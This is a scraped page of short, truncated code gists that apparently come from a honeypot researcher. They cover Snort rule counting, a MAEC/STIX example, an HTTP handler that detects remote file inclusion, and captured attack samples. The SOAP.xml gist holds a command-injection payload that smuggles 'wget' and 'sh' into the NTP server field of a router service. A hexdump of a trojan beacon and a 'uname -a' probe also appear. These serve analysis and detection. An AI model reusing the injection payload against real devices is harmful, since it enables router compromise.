glaslos /
Created July 30, 2013 13:47
Snort rules related to HTTP ports
import requests
# Counters for the tally loop that follows: rule_count is incremented for
# lines that are exactly "#" once stripped; http_rule_count is presumably
# incremented for lines mentioning $HTTP_PORTS (that branch's body is cut off
# in this listing - confirm).
rule_count = 0
http_rule_count = 0
# Download the rules file to scan.
# NOTE(review): the URL is empty in this listing (it appears to have been
# stripped); requests.get("") raises instead of fetching anything.
# NOTE(review): no timeout is passed and requests applies none by default, so
# a stalled server would hang the script - consider passing timeout=.
# NOTE(review): the response status is not checked before r.text is read, so
# an error page would be scanned as if it were rules - consider
# r.raise_for_status().
r = requests.get("")
for line in r.text.split("\n"):
if line.strip() == "#":
rule_count += 1
elif "$HTTP_PORTS" in line:
.. |landscape| image::
:alt: Code Health
glaslos /
Created August 7, 2014 08:30
MAEC in STIX example
from lxml import etree
from maec.package.package import Package
from stix.extensions.malware.maec_4_1_malware import MAECInstance
# Start from a MAEC Package constructed with no arguments; it is serialised
# with to_xml() further down.
malware_package = Package()
# STIX-side wrapper for MAEC content (imported from the maec_4_1_malware
# extension); its .maec attribute is assigned the parsed package XML below.
maec_malware_instance = MAECInstance()
maec_malware_instance.maec = etree.fromstring(
malware_package.to_xml(), parser=etree.ETCompatXMLParser()

glaslos /
Last active March 23, 2016 23:38
import SimpleHTTPServer
import SocketServer
# Module-level set defined ahead of the Handler class.
# NOTE(review): presumably records request paths seen by do_GET - the code
# that fills it is cut off in this listing; confirm. If it stores paths taken
# from incoming requests, nothing visible here bounds its size.
paths = set()
class Handler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_GET(self):
# Detect remote file inclusion
if '=http' in self.path:
import sys
import tty
import termios
# termios operates on file descriptors, so take the descriptor behind stdin.
fd = sys.stdin.fileno()
# Snapshot the current terminal attributes before anything modifies them.
# tcgetattr raises termios.error when stdin is not a terminal (e.g. piped input).
# NOTE(review): the code that changes the terminal mode and restores this
# snapshot is not visible in this listing - confirm the restore
# (termios.tcsetattr) runs in a finally block so an exception cannot leave
# the terminal in an altered mode.
old_settings = termios.tcgetattr(fd)
system("uname -a");
<?php echo("test successful"); ?>
glaslos / SOAP.xml
Created January 9, 2017 12:00
Get me some soap...
<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="" SOAP-ENV:encodingStyle="">
<u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">
<NewNTPServer1>`cd /var/tmp;cd /tmp;wget;sh a`</NewNTPServer1>
00000000 6c 76 7c 27 7c 27 7c 56 48 4a 76 61 6d 46 75 58 |lv|'|'|VHJvamFuX|
00000010 30 4d 30 4e 6b 59 32 52 54 6b 3d 7c 27 7c 27 7c |0M0NkY2RTk=|'|'||
00000020 4d 41 52 4b 7c 27 7c 27 7c 75 73 65 72 7c 27 7c |MARK|'|'|user|'||
00000030 27 7c 32 30 31 33 2d 31 31 2d 32 32 7c 27 7c 27 |'|2013-11-22|'|'|
00000040 7c 7c 27 7c 27 7c 57 69 6e 20 58 50 7c 27 7c 27 |||'|'|Win XP|'|'|
00000050 7c 4e 6f 7c 27 7c 27 7c 30 2e 36 2e 34 7c 27 7c ||No|'|'|0.6.4|'||
00000060 27 7c 2e 2e 7c 27 7c 27 7c 7c 27 7c 27 7c 5b 65 |'|..|'|'||'|'|[e|
00000070 6e 64 6f 66 5d |ndof]|
>>> base64.b64decode("VHJvamFuX0M0NkY2RTk=")